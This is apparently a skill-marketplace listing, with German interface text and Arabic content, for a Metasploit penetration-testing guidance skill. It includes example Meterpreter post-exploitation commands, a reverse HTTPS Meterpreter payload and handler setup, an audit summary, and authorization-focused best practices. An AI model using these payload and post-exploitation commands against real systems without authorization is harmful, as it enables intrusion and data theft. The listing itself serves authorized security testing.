Fähigkeiten pentest-metasploit
🎯

pentest-metasploit

Niedriges Risiko ⚙️ Externe Befehle🌐 Netzwerkzugriff📁 Dateisystemzugriff🔑 Umgebungsvariablen⚡ Enthält Skripte

دليل اختبار الاختراق باستخدام إطار عمل Metasploit

تعلم إجراء اختبارات الاختراق المصرح بها باستخدام إطار عمل Metasploit. توفر هذه المهارة مهام منظمة لتطوير الاستغلال والتحقق من الثغرات وعمليات الفريق الأحمر مع إرشادات مناسبة للتفويض والامتثال.

Unterstützt: Claude Codex Code(CC)
🥉 73 Bronze
1

Die Skill-ZIP herunterladen

2

In Claude hochladen

Gehe zu Einstellungen → Fähigkeiten → Skills → Skill hochladen

3

Einschalten und loslegen

Teste es

Verwendung von "pentest-metasploit". كيف أعد مساحة عمل Metasploit للاختبار وأستورد نتائج فحص Nmap؟

Erwartetes Ergebnis:

  • إنشاء مساحة عمل مخصصة: workspace -a <engagement-name>
  • استيراد نتائج Nmap: db_import /path/to/nmap-scan.xml
  • التحقق من المضيفين: أمر hosts
  • عرض الخدمات: أمر services
  • علامات Nmap الموصى بها لـ Metasploit: db_nmap -sV -sC -O <target>

Verwendung von "pentest-metasploit". ما أوامر ما بعد الاستغلال التي يجب تشغيلها أولاً بعد الحصول على جلسة Meterpreter؟

Erwartetes Ergebnis:

  • التحقق من الجلسة: getuid (يظهر المستخدم الحالي)
  • معلومات النظام: sysinfo (نظام التشغيل، البنية)
  • التحقق من الامتيازات: getprivs (الأذونات المتاحة)
  • تكوين الشبكة: ipconfig, route (جدول التوجيه)
  • قائمة العمليات: ps (العمليات الجارية للهجرة)
  • التحقق من برنامج مكافحة الفيروسات: run post/windows/gather/enum_av_excluded

Verwendung von "pentest-metasploit". كيف أكون حمولة Meterpreter HTTPS عكسي لنظام Windows؟

Erwartetes Ergebnis:

  • تعيين الحمولة: set PAYLOAD windows/x64/meterpreter/reverse_https
  • تكوين جهاز الاستقبال: set LHOST <your-ip>
  • منفذ جهاز الاستقبال: set LPORT 443
  • التحقق من الخيارات: show options
  • بدء المعالج: use exploit/multi/handler ثم run

Sicherheitsaudit

Niedriges Risiko
v5 • 1/16/2026

This is a pure documentation skill providing Metasploit Framework guidance. Contains no executable code, scripts, or network operations. All static findings are false positives - the scanner detects security tool names and techniques in educational documentation that would only be dangerous if executed. The skill emphasizes legal compliance and authorization requirements throughout.

6
Gescannte Dateien
2,189
Analysierte Zeilen
5
befunde
5
Gesamtzahl Audits

Risikofaktoren

⚙️ Externe Befehle (85)
assets/ci-config-template.yml:298 assets/ci-config-template.yml:301 assets/ci-config-template.yml:304 assets/ci-config-template.yml:307 assets/ci-config-template.yml:310 assets/ci-config-template.yml:134 assets/ci-config-template.yml:250 assets/ci-config-template.yml:291 references/EXAMPLE.md:54-74 references/EXAMPLE.md:74-95 references/EXAMPLE.md:95-108 references/EXAMPLE.md:108-111 references/EXAMPLE.md:111-118 references/EXAMPLE.md:118-122 references/EXAMPLE.md:122-129 references/EXAMPLE.md:129-135 references/EXAMPLE.md:135-151 references/EXAMPLE.md:151-154 references/EXAMPLE.md:154-162 references/EXAMPLE.md:162-296 references/EXAMPLE.md:296-306 references/EXAMPLE.md:306-309 references/EXAMPLE.md:309-318 references/EXAMPLE.md:318-333 references/EXAMPLE.md:333-342 references/EXAMPLE.md:342-346 references/EXAMPLE.md:346-354 references/EXAMPLE.md:354-358 references/EXAMPLE.md:358-361 references/EXAMPLE.md:361-371 references/EXAMPLE.md:371-404 references/EXAMPLE.md:404-414 references/EXAMPLE.md:414-447 references/EXAMPLE.md:447-451 references/EXAMPLE.md:451-472 references/EXAMPLE.md:472-476 references/EXAMPLE.md:476-537 references/WORKFLOW_CHECKLIST.md:74 SKILL.md:36-48 SKILL.md:48-79 SKILL.md:79-83 SKILL.md:83-87 SKILL.md:87-91 SKILL.md:91-97 SKILL.md:97-101 SKILL.md:101-113 SKILL.md:113-127 SKILL.md:127-133 SKILL.md:133-142 SKILL.md:142-154 SKILL.md:154-176 SKILL.md:176-179 SKILL.md:179-180 SKILL.md:180-181 SKILL.md:181-182 SKILL.md:182-188 SKILL.md:188-199 SKILL.md:199-202 SKILL.md:202-203 SKILL.md:203-204 SKILL.md:204-205 SKILL.md:205-211 SKILL.md:211-223 SKILL.md:223-227 SKILL.md:227-233 SKILL.md:233-276 SKILL.md:276-282 SKILL.md:282-286 SKILL.md:286-293 SKILL.md:293-297 SKILL.md:297-311 SKILL.md:311-315 SKILL.md:315-322 SKILL.md:322-330 SKILL.md:330-344 SKILL.md:344-348 SKILL.md:348-377 SKILL.md:377-390 SKILL.md:390-400 SKILL.md:400-411 SKILL.md:411-416 SKILL.md:416-430 SKILL.md:350 SKILL.md:444 SKILL.md:38
🌐 Netzwerkzugriff (26)
assets/ci-config-template.yml:240 assets/rule-template.yaml:43 assets/rule-template.yaml:44 assets/rule-template.yaml:45 assets/rule-template.yaml:73 assets/rule-template.yaml:118 assets/rule-template.yaml:119 assets/rule-template.yaml:151 assets/rule-template.yaml:191 assets/rule-template.yaml:192 assets/rule-template.yaml:193 assets/rule-template.yaml:217 assets/rule-template.yaml:260 assets/rule-template.yaml:261 assets/rule-template.yaml:288 skill-report.json:6 SKILL.md:19 SKILL.md:20 SKILL.md:21 SKILL.md:451 SKILL.md:452 SKILL.md:453 SKILL.md:454 SKILL.md:455 SKILL.md:229 SKILL.md:229
📁 Dateisystemzugriff (2)
assets/ci-config-template.yml:323 assets/ci-config-template.yml:323
🔑 Umgebungsvariablen (27)
assets/ci-config-template.yml:164 assets/ci-config-template.yml:164 assets/rule-template.yaml:148 assets/rule-template.yaml:148 assets/rule-template.yaml:147 assets/rule-template.yaml:162 assets/rule-template.yaml:132 assets/rule-template.yaml:147 assets/rule-template.yaml:148 assets/rule-template.yaml:156 assets/rule-template.yaml:157 assets/rule-template.yaml:162 assets/rule-template.yaml:162 assets/rule-template.yaml:163 assets/rule-template.yaml:164 assets/rule-template.yaml:165 references/EXAMPLE.md:423 references/EXAMPLE.md:423 references/EXAMPLE.md:423 references/EXAMPLE.md:424 references/EXAMPLE.md:425 references/EXAMPLE.md:427 references/EXAMPLE.md:430 references/EXAMPLE.md:432 references/EXAMPLE.md:437 references/EXAMPLE.md:437 references/EXAMPLE.md:444
⚡ Enthält Skripte (2)
references/EXAMPLE.md:138 references/EXAMPLE.md:137
Auditiert von: claude Audit-Verlauf anzeigen →

Qualitätsbewertung

55
Architektur
100
Wartbarkeit
87
Inhalt
20
Community
90
Sicherheit
100
Spezifikationskonformität

Was du bauen kannst

اختبار الاختراق المصرح به

إجراء اختبارات اختراق منظمة مع تحديد النطاق المناسب والتوثيق التفويضي والامتثال لمعايير الأمان مثل PTES و OWASP.

عمليات الفريق الأحمر

التخطيط وتنفيذ تمارين الفريق الأحمر بما في ذلك تقديم الاستغلال وما بعد الاستغلال وتقييمات الحركة الجانبية مع إرشادات الأمان العملياتي.

بحث الثغرات

إثبات تأثير الاستغلال والتحقق من الثغرات في بيئات بحث خاضعة للرقابة مع التفويض والتوثيق المناسبين.

Probiere diese Prompts

بدء سريع 
أرني كيفية تهيئة إطار عمل Metasploit وتشغيل قاعدة بيانات PostgreSQL والتحقق من الاتصال لاختبار اختراق
إعداد الاستغلال 
كيف أختار وحدة استغلال مناسبة في Metasploit وأكوين خيارات الهدف وأعد حمولة HTTPS عكسي وأنفذ الاستغلال
ما بعد الاستغلال 
ما أوامر Meterpreter الأساسية لجمع معلومات النظام وتعداد العمليات وتحديد فرص رفع الامتيازات بعد الحصول على جلسة
تخصيص ATT&CK 
خصص أنشطة Metasploit الشائعة مثل الوصول الأولي والوصول إلى بيانات الاعتماد والحركة الجانبية لتقنيات وتكتيكات MITRE ATT&CK المحددة

Bewährte Verfahren

  • تحقق دائمًا من التفويض المكتوب من مالكي الأصول قبل إجراء أي أنشطة اختبار اختراق على الأنظمة
  • وثيق جميع الأوامر المنفذة والنتائج المكتشفة والأدلة المجمعة لإعداد تقارير الامثال والحماية القانونية
  • خصص الأنشطة لإطار عمل MITRE ATT&CK لفهم تقنيات الخصوم وتحسين قدرات الاكتشاف
  • أغلق جميع الجلسات بشكل نظيف وأزل آثار الاستغلال بعد إكمال تقييم المهمة

Vermeiden

  • اختبار الأنظمة دون تفويض كتابي صريح - هذا غير قانوني وقد يؤدي إلى الملاحقة الجنائية
  • الفشل في توثيق حدود النطاق أثناء المهمة - قد يؤدي إلى انتهاكات الامثال والمسؤولية القانونية
  • ترك الجلسات النشطة أو آليات الاستمرارية بعد التقييم - قم دائمًا بتنظيف جميع آثار Metasploit

Häufig gestellte Fragen

ما التبعيات المطلوبة لـ Metasploit؟
يتطلب Metasploit PostgreSQL للاتصال بقاعدة البيانات و Nmap للتكامل في الاستطلاع وحزمة metasploit-framework. يتضمن Kali Linux Metasploit مُهيأ مسبقًا.
هل تنفذ هذه المهارة الاستغلالات تلقائيًا؟
لا، توفر هذه المهارة التوثيق والإرشادات فقط. يتطلب تنفيذ الاستغلال الفعلي تثبيت Metasploit منفصل ويتم بواسطة المستخدم.
كيف أخصص أنشطة Metasploit لـ MITRE ATT&CK؟
استخدم قسم تخصيص ATT&CK الذي يوثق TTPs: الوصول الأولي (T1190)، والتنفيذ (T1059)، والاستمرارية (T1547)، ورفع الامتيازات (T1068)، والوصول إلى بيانات الاعتماد (T1003)، والحركة الجانبية (T1021).
ما التفويض المطلوب لاختبار الاختراق؟
التفويض الكتابي من مالك الأصول إلزامي. وثق النطاق ونوافذ الاختبار والأنظمة المستهدفة وجهات الاتصال الطارئة قبل بدء أي أنشطة اختبار.
كيف أتعامل مع بيانات الاعتماد المكتشفة أثناء الاختبار؟
وثق بيانات الاعتماد المكتشفة لكن لا تصل إلى أنظمة خارج النطاق. اتبع قواعد المهمة لمعالجة البيانات. أبلغ عن النتائج فورًا وفق إجراءات التصعيد.
كيف يختلف هذا عن ماسحات الثغرات الآلية؟
يوفر Metasploit قدرات الاستغلال بدلاً من مجرد الاكتشاف. يتيح ذلك التحقق من تأثير الثغرات ومحاكاة الهجوم الواقعية. استخدم مع التفويض المناسب.

Entwicklerdetails

Lizenz

MIT

Repository

https://github.com/AgentSecOps/SecOpsAgentKit/tree/main/skills/offsec/pentest-metasploit

Ref

main

Dateistruktur

📁 assets/

📄 ci-config-template.yml

📄 rule-template.yaml

📁 references/

📄 EXAMPLE.md

📄 WORKFLOW_CHECKLIST.md

📄 SKILL.md